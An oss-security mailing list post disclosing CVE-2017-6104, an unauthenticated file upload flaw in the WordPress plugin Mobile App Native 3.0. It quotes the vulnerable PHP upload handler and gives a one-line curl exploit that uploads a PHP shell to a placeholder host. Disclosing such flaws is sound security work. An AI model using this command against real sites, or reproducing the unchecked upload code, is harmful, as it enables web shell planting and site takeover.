|
Message-id: <798D4367-AFCB-43FF-A603-F296E7E38ECE@me.com> Date: Thu, 02 Mar 2017 13:52:23 -0500 From: "Larry W. Cashdollar" <larry0@...com> To: Open Source Security <oss-security@...ts.openwall.com> Subject: Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0 Title: Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0 Author: Larry W. Cashdollar, @_larry0 Date: 2017-02-27 Download Site: https://wordpress.org/plugins/zen-mobile-app-native/ Vendor: https://profiles.wordpress.org/zendkmobileapp/ Vendor Notified: 2017-02-27 Vendor Contact: Description: Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder. Vulnerability: The code in file ./zen-mobile-app-native/server/images.php doesn't require authentication or check that the user is allowed to upload content. It also doesn't sanitize the file upload against executable code. <?php //header('content-type: text/html; charset=iso-8859-2'); header('Content-Type: text/html; charset=utf-8'); header('Access-Control-Allow-Origin: *'); require_once('function.php'); if ($_FILES['file']['name']) { if (!$_FILES['file']['error']) { $name = md5(rand(100, 200)); $ext = explode('.', $_FILES['file']['name']); $filename = $name . '.' . $ext[1]; $destination = 'images/' . $filename; $location = $_FILES["file"]["tmp_name"]; move_uploaded_file($location, $destination); echo $plugin_url.'/server/images/' . $filename; } else { echo $message = 'Ooops! Your upload triggered the following error: '.$_FILES['file']['error']; } } CVE-ID: CVE-2017-6104 Exploit Code: $ curl -F "file=@...r/www/shell.php" "http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/server/images.php" http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native//server/images/8d5e957f297893487bd98fa830fa6413.php Advisory: http://www.vapidlabs.com/advisory.php?v=178
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.